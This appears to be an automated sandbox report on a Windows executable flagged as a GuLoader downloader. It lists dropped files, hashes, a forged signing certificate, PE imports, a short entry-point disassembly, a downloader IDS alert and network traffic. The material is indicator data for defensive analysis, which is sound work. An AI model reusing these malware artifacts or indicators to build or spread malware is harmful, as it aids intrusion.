                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:eAvqHiIsgR.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:e67d5a5be1e0f1033957b79737340afe9889998f6c2db786144b415ddf202ee7.exe
                                            Detection:MAL
                                            Classification:mal76.troj.evad.winEXE@3/8@2/2
                                            EGA Information:
                                            • Successful, ratio: 50%
                                            HCA Information:
                                            • Successful, ratio: 81%
                                            • Number of executed functions: 48
                                            • Number of non-executed functions: 29
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtCreateKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: eAvqHiIsgR.exe
                                            No simulations
                                            No context
                                            No context
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            37f463bf4616ecd445d4a1937da06e19tebWUNHW7S.exeGet hashmaliciousGuLoaderBrowse
                                            • 142.250.181.129
                                            • 172.217.19.174
                                            kvk78zDZTu.exeGet hashmaliciousGuLoaderBrowse
                                            • 142.250.181.129
                                            • 172.217.19.174
                                            RAZTZoDeHA.exeGet hashmaliciousGuLoaderBrowse
                                            • 142.250.181.129
                                            • 172.217.19.174
                                            kvk78zDZTu.exeGet hashmaliciousGuLoaderBrowse
                                            • 142.250.181.129
                                            • 172.217.19.174
                                            w0nz47MlOe.exeGet hashmaliciousGuLoaderBrowse
                                            • 142.250.181.129
                                            • 172.217.19.174
                                            w0nz47MlOe.exeGet hashmaliciousGuLoaderBrowse
                                            • 142.250.181.129
                                            • 172.217.19.174
                                            gJUrBC17Wh.exeGet hashmaliciousGuLoaderBrowse
                                            • 142.250.181.129
                                            • 172.217.19.174
                                            9WdUhQEKvX.exeGet hashmaliciousGuLoaderBrowse
                                            • 142.250.181.129
                                            • 172.217.19.174
                                            NX6BOqyG3J.exeGet hashmaliciousGuLoaderBrowse
                                            • 142.250.181.129
                                            • 172.217.19.174
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\user\AppData\Local\Temp\nsa617D.tmp\System.dllRFQ-24064562-SUPPLY-NOv-ORDER.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              LkzvfB4VFj.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                LkzvfB4VFj.exeGet hashmaliciousGuLoaderBrowse
                                                  z120X20SO__UK__EKMELAMA.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    Quotation-GINC-19-00204.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      Produkttyper.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        Impressionist.exeGet hashmaliciousGuLoaderBrowse
                                                          PAGO.exeGet hashmaliciousGuLoaderBrowse
                                                            PAGO.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              Process:C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):11776
                                                              Entropy (8bit):5.854450882766351
                                                              Encrypted:false
                                                              SSDEEP:192:jPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4I:u7VpNo8gmOyRsVc4
                                                              MD5:34442E1E0C2870341DF55E1B7B3CCCDC
                                                              SHA1:99B2FA21AEAD4B6CCD8FF2F6D3D3453A51D9C70C
                                                              SHA-256:269D232712C86983336BADB40B9E55E80052D8389ED095EBF9214964D43B6BB1
                                                              SHA-512:4A8C57FB12997438B488B862F3FC9DC0F236E07BB47B2BCE6053DCB03AC7AD171842F02AC749F02DDA4719C681D186330524CD2953D33CB50854844E74B33D51
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Joe Sandbox View:
                                                              • Filename: RFQ-24064562-SUPPLY-NOv-ORDER.com.exe, Detection: malicious, Browse
                                                              • Filename: LkzvfB4VFj.exe, Detection: malicious, Browse
                                                              • Filename: LkzvfB4VFj.exe, Detection: malicious, Browse
                                                              • Filename: z120X20SO__UK__EKMELAMA.exe, Detection: malicious, Browse
                                                              • Filename: Quotation-GINC-19-00204.exe, Detection: malicious, Browse
                                                              • Filename: Produkttyper.exe, Detection: malicious, Browse
                                                              • Filename: Impressionist.exe, Detection: malicious, Browse
                                                              • Filename: PAGO.exe, Detection: malicious, Browse
                                                              • Filename: PAGO.exe, Detection: malicious, Browse
                                                              Reputation:moderate, very likely benign file
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....`...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):437032
                                                              Entropy (8bit):2.6470522931567846
                                                              Encrypted:false
                                                              SSDEEP:3072:bSnLz72K/yG3pRsYhtRpehLG3a+slQ2huKa:oLz72xGZRsiRpe9CZslQ2huT
                                                              MD5:53118B7494C59D46E9BFD8977F248EDA
                                                              SHA1:2F6C3005A562EB0D187BF751D949FECC3FEA7C9E
                                                              SHA-256:F7A37EC1F6A7E6CA0ECBD78BCC9BCC4801F233E0B5F9156A025CE5723A3D0BEB
                                                              SHA-512:9188CB5A8A1EE5ACAAFB715C5EAEC50C187D2C7DB357AE90C1F7B51AF95E9409681A7B0D119994011F54181A81C18C09EAE6A07BD2E240B4E31185CC15422DD4
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:00008282828282007B000000001200A7A7A7A700CDCDCD000000C000000000720000FEFE000000005D5D000000DE0000D900080048480000001F1F00C40000EC00A70095950000000080009B00000083830000626262000058585800C3C3C300005100CECE001F1F1F000000AE00000000D600470000002A2A0000006E0000B8B8000000AF00005C000000000070000049000042000200000000000000C1004E000000D2D2009F9F9F9F9F9F000000ABAB00595900000086000000000000006800000C0000620000007B7B00AAAAAAAAAAAA00050505000909000000001300CC00004D4D000000000000230000002B00FB0000006000A7000000180000AFAFAF00000074000065000060000000D900606000000000000000880000000000020003002700CC007300333333000000000075757575757500A600006D6D00777777777700B500C8C8C800002D004F0000989800001400008700FFFF007800001300B40000E90000000000FF000061004C00525252520000000057009F00FF002B0000310000006868686868686868007700007B7B00000000009A9A9A9A9A00C0C0C0007800003C3C00F3F3000098989898980000000082820000B6B600000018004848484800CE0000004100B200848484004C4C4C00B7B70000D800005F001B000040000055550000000046001111110040404000
                                                              Process:C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):207640
                                                              Entropy (8bit):7.546004720534882
                                                              Encrypted:false
                                                              SSDEEP:3072:ASesIpE62+wizRgXw/kibtZaVNv4rw9KKRiYeKJSulQB0ClQztX9JnJg2yJ6MKN+:AFsIpGgm/9HteKby0oQznM2Aa+
                                                              MD5:252B537AA9192BBF6F11B925E38F0353
                                                              SHA1:5FA65E7E8E29B9097AE0510E4D405CDC2AF764BC
                                                              SHA-256:44A675E5F8D832568BF91CD9C6D6D393FE4B55D8FE353492CBE5CA42B8FE0002
                                                              SHA-512:FD5EA259314B678A8506BF6C2E47A1C133882F1CDD9F4BF5C82E56AC5E67AE6ED89FAF6A635AB4EDA451074D87B02E17D14191A44E0AD8F40AA08004549ADFA3
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:...............kk..=...........................W.........s............i.TT.....5.....$......a............)........._......:..............K...9............kkk.....................L.............Z...{..5....u.............................................................88..].................................................C...kk....((.......................>.....j............7777..5.............W...........111.............gggg...............hh.....................'.-............777..........W.................HHH..............."......................u..".............o..XX.......................&....AAA..33.....................I............''...............DD.........7.............................))............S...................g.d..SSS.@@......................-.............i........#............................p....q.............ee.....................................u.........w.......E.#...ooo.cc..........."..e.9..X..........a......?...66.O............<.((.......r...;;........kkkk..r.l..
                                                              Process:C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):485127
                                                              Entropy (8bit):1.2565961974341746
                                                              Encrypted:false
                                                              SSDEEP:768:bgBMgq+aLnwfPnz/Km1iLGyDPiU55NCk+T93YpnK77oTpvYP3knePjlW0kwNGL+q:XQ3wvosOsCpxFJrXSBmHzTu58UR
                                                              MD5:580D05E679E74B036B55CA8E5FF32769
                                                              SHA1:10175C43AB7B725FFFCF770EB2C3555E91D3BA13
                                                              SHA-256:B3E34975017C193D4672BEC42BC52B55F8AE1F1D5F30D56DCFD0B3A4242C3BE4
                                                              SHA-512:0E26F0084BED372785A5E8C8BE3A0717074AA52C2E8B5413FA9F2CB8DEED40BF8BDBF15C411EFFA432A8B96E50AE6085E8F90A97350827AFAA1BE1AB4B3E1643
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:.................3.........................................=.....................................`.............................................................................n........................... .L.........................(,.b...e.......\...............................u.....................[.............................n........................[........................................c...........................W...........................................................*..].h.............R..............................................*............................^.....$.....w...................................................p...............................................................$.t...................................w*....................b....E.......................|.............5.......E................................................P.........d..................vl...........}..."..................................1.............................k.....7...............
                                                              Process:C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):389868
                                                              Entropy (8bit):1.2469892412772452
                                                              Encrypted:false
                                                              SSDEEP:768:8mGX5iY6YFC1hSNYG8n6aCKBHwcX7e3ZNrt7qNIxKpGEopKfWOO72cDEDQ+7IF5i:m5ittaAwW6q8KH13QyOgs2w
                                                              MD5:2A500E1219C4894E2D45C32C5A5A11FD
                                                              SHA1:AC9A88DE4C84E1EB8A535E1061CBC6584380D24E
                                                              SHA-256:C65F223375C6DFE8CE71213D5DD24F39CDE31F772D2C66521BF07B21BE45E6C1
                                                              SHA-512:89ED91AF91CF969FE7EC087EE107B52959582615EFB2AB72A21D6C3820E5BDDA78EE02EB39BB323FD996D85510627387616DF8917B12052A62D288D8E9448596
                                                              Malicious:false
                                                              Preview:...........................E.....................................................................<......................].....f........................_...G..........S....................................@...............j...................................................I...................|..C..........................................................d......%t..........N..................d...Q...........p....3..........................................L...........y...............................-........................................................................@.........]..3........A................................*............................................................................................@...........(............................{..4......................................k.................{.....................W.................,......+...............K....b.......................!.............................H..)..........................E..........................
                                                              Process:C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):442363
                                                              Entropy (8bit):1.2533707838755617
                                                              Encrypted:false
                                                              SSDEEP:1536:f6KFImN7hPg1fMcZ9pkK6m1rmkrDAji7VW9EgfrY:PyMtabPE+7ctfM
                                                              MD5:5465B75724C031B21C018F7D72941F72
                                                              SHA1:98176B27A41A35401A96D0AAC0859EEC25A4C5FE
                                                              SHA-256:7390780C6FB1F7B57C950A11AE287127CB6144CE9AD1C26E8C242BADB685729B
                                                              SHA-512:7084191B13FF854943DEE9FB6DDC1D7F89D06055FF4DA7E04DA1C359B557AC22762209B8DFE061F3AF628DF077E1D1D1009E9F9A18E3C9441AEE7FD4FDFF1688
                                                              Malicious:false
                                                              Preview:.........................................................................|......................................v..g..................................................................C...........`.......................................... ...............#.....................K..0.................\................................4.......................................y...................."........k..............9.H.................................................................."...........m............................6...................................................E..)..........[..............TZ..............Q............_...........$...... ..........................W....................................................y..................................q......!.................................... .....................o..........*........................................................................[..............9..................s....;..........................................
                                                              Process:C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):521
                                                              Entropy (8bit):4.284169749449499
                                                              Encrypted:false
                                                              SSDEEP:12:7+SriF8i+WUQDJBYqRIE47W0BvM71ARi9ulhji4JDQCr6K:7tuZ+d6/GEUI18jhJsCr6K
                                                              MD5:B089BD0CBC944DE0B1023E6CE9318BD3
                                                              SHA1:715FA74E243D5C3419519E7371ED1836C9BCFA4A
                                                              SHA-256:1E8ABB4A5E85595B0EF2FC73E9012EDDFE1BCB7363E90A2EA46F561DD3742F93
                                                              SHA-512:A164EB2AB02E612E9F96531006C4A71B8D6E8EA6444D86907CB15EF2C1AAB4680EAF3BB580C6A1D5B89A3F454F3E532242FC1DE2B71A9FFF56F812F6E4638885
                                                              Malicious:false
                                                              Preview:dibasic skinnebenssaarenes rembrandt unembayed timerne ependytes overtorturing.ruskindenes cellemembranen visirs daarligste bartholomeuss eslabon trflen communizations karikaturtegners forsgsstadiet hillocked..perfumers afplukker simonized jubilumsmiddags dolktids spokane milliontedel indfoertes dour..margented pomerans semicylindrical skifferolies kernerelationerne univalent,tiltrdelsesforelsning hydrion caggy stabejserne figurist vt klutzier bendy hanekamme..duilin molompi cuartino fornagl tortricoidea unhurrying.
                                                              Process:C:\Users\user\Desktop\eAvqHiIsgR.exe
                                                              File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                              Category:modified
                                                              Size (bytes):754
                                                              Entropy (8bit):3.3027259102800293
                                                              Encrypted:false
                                                              SSDEEP:12:8wl0dsXMlykXuGlnEElkXOEOqkXu3w/g/jNJkKAp4t2YZ/elFlSJm:8OrWvlX3qw/4hHAzqy
                                                              MD5:4CF5311D4D3C7F8529A7444A1BDE92AC
                                                              SHA1:87C97FA322DAB6719FE9111565D34D4849833FF0
                                                              SHA-256:32B62B1DB267EB609645F136E4D54B38A04D9246C7AEBC2DD9DB4BA5D3213616
                                                              SHA-512:4F3921FFC4E0DF7DEB2E8AF4BC2C9B4D1645829BFBB205FB22E159AC0234F68DA7A38C8A23DC772DEADF135425B369F11EECAB0A7E69FB8E62C53F7E5B171E1E
                                                              Malicious:false
                                                              Preview:L..................F........................................................G....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....\.1...........user.D............................................f.r.o.n.t.d.e.s.k.....l.2...........Disannex.And37..N............................................D.i.s.a.n.n.e.x...A.n.d.3.7.......!.....\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.D.i.s.a.n.n.e.x...A.n.d.3.7.'.C.:.\.U.s.e.r.s.\.f.r.o.n.t.d.e.s.k.\.t.r.a.n.c.h.e.t.\.T.r.y.k.m.a.a.l.e.r.e.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                              Entropy (8bit):7.540997501747662
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:eAvqHiIsgR.exe
                                                              File size:882'600 bytes
                                                              MD5:61518cfded3109fac04ee916ab275c26
                                                              SHA1:c624a4ee78183d82fb8264f74953d32ddcae5481
                                                              SHA256:e67d5a5be1e0f1033957b79737340afe9889998f6c2db786144b415ddf202ee7
                                                              SHA512:478737a68a76e03b10e477a47115eb643e9c7242e5a5d7ef0c635060cb0318fd185c6be59793ba66057f811d6f623c68daabd5dfddcc8c3d4dc4d9b8be7096af
                                                              SSDEEP:24576:yiGFaq43NvC7kHJTPrbG4ujTrlq8e+xfJ/QOeaq:yiGFu3Nv3HJTkdde+tJ/qaq
                                                              TLSH:11151266F700D89AE8758F31982EC146E7E4BE2918641B5B3F9ABF2FBCB2050D10F515
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L... ..`.................f...|......H3............@
                                                              Icon Hash:0e13672535353f1c
                                                              Entrypoint:0x403348
                                                              Entrypoint Section:.text
                                                              Digitally signed:true
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x60FC9220 [Sat Jul 24 22:20:16 2021 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:ced282d9b261d1462772017fe2f6972b
                                                              Signature Valid:false
                                                              Signature Issuer:CN="Biose Etherising Snoreassistenterne ", E=Thyroidectomy@Grasserie.Rat, L=Millersburg, S=Kentucky, C=US
                                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                              Error Number:-2146762487
                                                              Not Before, Not After
                                                              • 11/02/2024 10:37:17 10/02/2027 10:37:17
                                                              Subject Chain
                                                              • CN="Biose Etherising Snoreassistenterne ", E=Thyroidectomy@Grasserie.Rat, L=Millersburg, S=Kentucky, C=US
                                                              Version:3
                                                              Thumbprint MD5:07F4C9648CE525564FACE18D1081137B
                                                              Thumbprint SHA-1:B05FDEA76018F6B4F74CA880D732D7C4CFAE9B3A
                                                              Thumbprint SHA-256:3F87A7BAF788D5593E84370B6F3D6C86548799431B126CFF6183A98F77C743B6
                                                              Serial:569C0070FED303446D97771BD262BA0ED17A9696
                                                              Instruction
                                                              sub esp, 00000184h
                                                              push ebx
                                                              push esi
                                                              push edi
                                                              xor ebx, ebx
                                                              push 00008001h
                                                              mov dword ptr [esp+18h], ebx
                                                              mov dword ptr [esp+10h], 0040A198h
                                                              mov dword ptr [esp+20h], ebx
                                                              mov byte ptr [esp+14h], 00000020h
                                                              call dword ptr [004080B8h]
                                                              call dword ptr [004080BCh]
                                                              and eax, BFFFFFFFh
                                                              cmp ax, 00000006h
                                                              mov dword ptr [0042F42Ch], eax
                                                              je 00007F4E9C7AA2E3h
                                                              push ebx
                                                              call 00007F4E9C7AD446h
                                                              cmp eax, ebx
                                                              je 00007F4E9C7AA2D9h
                                                              push 00000C00h
                                                              call eax
                                                              mov esi, 004082A0h
                                                              push esi
                                                              call 00007F4E9C7AD3C2h
                                                              push esi
                                                              call dword ptr [004080CCh]
                                                              lea esi, dword ptr [esi+eax+01h]
                                                              cmp byte ptr [esi], bl
                                                              jne 00007F4E9C7AA2BDh
                                                              push 0000000Bh
                                                              call 00007F4E9C7AD41Ah
                                                              push 00000009h
                                                              call 00007F4E9C7AD413h
                                                              push 00000007h
                                                              mov dword ptr [0042F424h], eax
                                                              call 00007F4E9C7AD407h
                                                              cmp eax, ebx
                                                              je 00007F4E9C7AA2E1h
                                                              push 0000001Eh
                                                              call eax
                                                              test eax, eax
                                                              je 00007F4E9C7AA2D9h
                                                              or byte ptr [0042F42Fh], 00000040h
                                                              push ebp
                                                              call dword ptr [00408038h]
                                                              push ebx
                                                              call dword ptr [00408288h]
                                                              mov dword ptr [0042F4F8h], eax
                                                              push ebx
                                                              lea eax, dword ptr [esp+38h]
                                                              push 00000160h
                                                              push eax
                                                              push ebx
                                                              push 00429850h
                                                              call dword ptr [0040816Ch]
                                                              push 0040A188h
                                                              Programming Language:
                                                              • [EXP] VC++ 6.0 SP5 build 8804
                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x580000x41dd0.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xd63f80x13b0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x64570x6600f6e38befa56abea7a550141c731da779False0.6682368259803921data6.434985703212657IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0x80000x13800x1400569269e9338b2e8ce268ead1326e2b0bFalse0.4625data5.2610038973135005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0xa0000x255380x60017edd496e40111b5a48947c480fda13cFalse0.4635416666666667data4.133728555004788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .ndata0x300000x280000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0x580000x41dd00x41e0051f103b856396aac282c5bd5a24beff1False0.6063619248102466data5.8960782160116745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_ICON0x583b80x130caPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.998410786148207
                                                              RT_ICON0x6b4880x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.40775464332189754
                                                              RT_ICON0x7bcb00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.4554866512507883
                                                              RT_ICON0x851580x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishUnited States0.462218045112782
                                                              RT_ICON0x8b9400x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.4729667282809612
                                                              RT_ICON0x90dc80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.46835144071799717
                                                              RT_ICON0x94ff00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5149377593360995
                                                              RT_ICON0x975980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5457317073170732
                                                              RT_ICON0x986400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6073770491803279
                                                              RT_ICON0x98fc80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6719858156028369
                                                              RT_DIALOG0x994300x100dataEnglishUnited States0.5234375
                                                              RT_DIALOG0x995300x11cdataEnglishUnited States0.6056338028169014
                                                              RT_DIALOG0x996500xc4dataEnglishUnited States0.5918367346938775
                                                              RT_DIALOG0x997180x60dataEnglishUnited States0.7291666666666666
                                                              RT_GROUP_ICON0x997780x92Targa image data - Map 32 x 12490 x 1 +1EnglishUnited States0.7191780821917808
                                                              RT_VERSION0x998100x27cdataEnglishUnited States0.5
                                                              RT_MANIFEST0x99a900x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                              DLLImport
                                                              ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                              SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                              ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                              COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                              USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                              GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                              KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv
                                                              Language of compilation systemCountry where language is spokenMap
                                                              EnglishUnited States
                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                              2024-12-03T17:33:47.033223+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749913172.217.19.174443TCP
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 3, 2024 17:33:44.363722086 CET49913443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:33:44.363833904 CET44349913172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:33:44.364070892 CET49913443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:33:44.399064064 CET49913443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:33:44.399080992 CET44349913172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:33:46.096452951 CET44349913172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:33:46.096551895 CET49913443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:33:46.097237110 CET44349913172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:33:46.097296953 CET49913443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:33:46.287548065 CET49913443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:33:46.287574053 CET44349913172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:33:46.287947893 CET44349913172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:33:46.288011074 CET49913443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:33:46.307739019 CET49913443192.168.2.7172.217.19.174
                                                              Dec 3, 2024 17:33:46.351332903 CET44349913172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:33:47.033221960 CET44349913172.217.19.174192.168.2.7
                                                              Dec 3, 2024 17:33:47.033356905 CET49913443192.168.2.7172.217.19.174
